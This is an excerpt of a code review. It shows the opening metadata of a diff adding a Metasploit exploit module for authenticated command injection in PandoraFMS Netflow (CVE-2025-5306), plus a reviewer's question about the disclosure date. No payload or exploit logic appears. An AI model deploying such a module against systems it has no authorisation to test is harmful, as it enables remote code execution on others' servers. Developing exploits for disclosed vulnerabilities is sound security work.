modules/exploits/linux/http/pandora_fms_auth_netflow_rce.rb

```diff
@@ -0,0 +1,206 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PandoraFMS Netflow Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Netflow component of PandoraFMS. The module requires a set of user credentials to modify Netflow settings. Also, Netflow binaries have to be present on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['msutovsky-r7'], # researcher, module dev
+        'References' => [
+          [ 'CVE', '2025-5306']
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ ARCH_CMD ],
+        'Privileged' => false,
+        'Targets' => [
+
+          [
+            'Linux/Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ ARCH_CMD]
+            }
+          ]
+        ],
+        'DisclosureDate' => '2025-12-30',
```

Comment:
This disclosure date is in the future is it meant to be `2025-06-27` https://nvd.nist.gov/vuln/detail/CVE-2025-5306